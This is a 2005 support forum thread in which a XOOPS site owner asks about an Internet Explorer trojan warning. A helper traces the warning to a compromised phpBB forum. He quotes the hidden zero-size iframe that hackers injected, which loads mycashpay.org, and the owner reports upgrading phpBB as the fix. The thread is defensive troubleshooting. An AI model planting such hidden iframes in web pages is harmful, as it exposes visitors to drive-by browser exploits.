1
Daethian
I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 5:11

  • Daethian

  • Quite a regular

  • Posts: 305

  • Since: 2005/3/4 1


I am absolutely anal about protecting my pc from this junk. I didn't even know it was there until I went to work today and viewed the site through IE and a warning popped up for a trojan ...some sort of exploit.

I don't see how anything could have downloaded and got past my antivirus. Could this have happened though the custom avatar thing? That's why I logged on at work, to shut that off. My site is not live yet because I'm still building.

There is something called cashpay.org loading on the page and I'm not sure what that it.

How the hell can I get rid of this thing?

http://www.scooterchick.net/xoops

2
m0nty
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 7:53

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


we can't tell from the link you provide as you closed your site.. this stops us checking anything..

however for your peace of mind, XOOPS definitely contains NO trojans or spyware..

presuming antivirus stops everything is not the best way to go either.. can u actually tell us what your antivirus detects?

and there is no cashpay.org in existence.. which should be a website and isn't itself any kind of trojan or it would probably be an executable file..

without viewing your site we can't tell u anything..

maybe you have spyware on your pc.. and lets not pretend that antivirus software protects against spyware because it doesn't 100% (spyware and virii are totally different) i'd recommend ad-aware and spybot s&d to double check.

other than that i can't give u anymore info until you open your site for us to see.

3
Daethian
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 15:58

  • Daethian

  • Quite a regular

  • Posts: 305

  • Since: 2005/3/4 1


There is no way that my work computer is infected.

My server says that he thinks that the older version of IE that we use at work doesn't recognize all the XOOPS and it thinks its a trojan.

4
hyperpod
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 16:42

  • hyperpod

  • Quite a regular

  • Posts: 359

  • Since: 2004/10/4


You are wrong about xoops. period.

there is no spyware in xoops. period.

If you want to really solve your problem, you will need to identify the real source.


Your going the wrong way if you think there is ANYTHING like this being caused by xoops.


IE is the bigger problem... I recommend using FireFox.


You have Adware installed on your computer. (not from xoops)

I suggest running AdAware and updating the scan file.


Good Luck,


_Dan

5
m0nty
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 18:04

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


u maybe right regarding the browser.. but i've used XOOPS with IE versions of IE 4 and nothing was given untoward.. but the browser itself doesn't do the detecting..

i've searched high & low on google, msn search and alltheweb.com to find cashpay.org and it draws a blank everytime.. the site just doesn't exist.. cashpay.com exists and belongs to the bank of america.. but as for that being spyware even that becomes doubtful after reading their website..

i'd like to help narrow it down, but we'll need a little more info, especially we need to know what the name of the trojan is that your anti-virus software is detecting.. an anti virus package would not say there is a trojan and not give a name for the trojan it's supposed to have found.. at least with a name we could track it.. also if we could take a look at your site with our own systems then we could tell you whether there are any malicious scripts..

but please consider your statement "There is no way that my work computer is infected" how can you be 100% sure? the only way you could possibly be 100% safe from virus is if your system is totally isolated from the internet and any network, and that the software you use is installed from genuine CD's and that no disc or any media is ever inserted into the drive.

relying on your virus package and thinking that will give you 100% complete protection is fool hardy.. virus companies release virus definitions after a virus has been discovered, they can't discover a new virus till someone becomes infected by a virus, and then that infected file is submitted to the virus research centre such as (SARC) who then examine the new virus to de engineer it and then release a definition that can kill the virus..

if you're using windows software then you're extremely prone to viruses no matter what anti-virus software you use..

but you are right that sometimes false detections do occur. but a name of the trojan detected could help us.. as like i say i can't find zero on anything called cashpay.org

6
m0nty
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/10 18:21

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


ok after examining your site.. there is no cashpay.org in your XOOPS installation..

however!!!

if you goto your forum (php 2.0.11) which isn't integrated XOOPS module..

i can confirm something tries to load from 'mycashpay.org' now all references i can find for mycashpay.org just point to a 403 forbidden error..

but viewing the source code of your forum index page i see this in the source..

<td class="row1" height="45"><img src="templates/fiblack/images/folder.gif" width="25" height="25" class="imgfolder" alt="No new posts" title="No new posts" />td>
<
td class="row1" width="100%"><a href="viewforum.php?f=1" class="nav">Meet ~NGreeta><br />
<
span class="genmed">Say hi and tell us about your bike




<iframe src="http://mycashpay.org/" width=0 height=0>iframe><br />


which tells me it's a phpbb problem causing this and not xoops..

i should check the template/skin you use for phpbb and try and find that iframe section and remove it..

but this didn't set any alerts going on my anti-virus etc.. i think the alert you maybe getting is if like you say you are using an older browser and that browser possibly doesn't support the use of frames which is giving a false error..

7
Daethian
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/11 3:30

  • Daethian

  • Quite a regular

  • Posts: 305

  • Since: 2005/3/4 1


Thanks so much Monty!
At work we are using IE 6.02
mcafee is picking up exploit-MhtRedir.gen

I will point my web host to the issue you found and see if he can help me clean that forum.

hyperpod:
I didn't think XOOPS was infected and didn't say that. The thing with the custom avatar on the front page of the site made me wonder if that is how I was attacked is all. I'm brand new to XOOPS so I'm not familiar with just how big of a exploit the custom avatar thing is.

I don't use IE at home but I can't control what my company uses. The computer at work DOES NOT HAVE ADWARE on it. We are highly restricted to what sites we are allowed to browse. Plus if someone had infected the entire network, we'd lose our internet privliges. Nor does my PC at home. I know that nothing is 100% but I'm diligent about protecting my PC. I haven't done anything with that forum in quite some time so maybe someone got in before I upgraded it to the most secure version.

8
Daethian
Re: I installed XOOPS this week and now my site has a trojan?
  • 2005/3/11 4:59

  • Daethian

  • Quite a regular

  • Posts: 305

  • Since: 2005/3/4 1


Well my forum (along with others) was hacked.
The hacker added that redirect to exploit IE into going to the site where the actual virus was imbedded. I'm clean for now but have to upgrade to 2.0.13

Login

Who's Online

260 user(s) are online (157 user(s) are browsing Support Forums)


Members: 0


Guests: 260


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits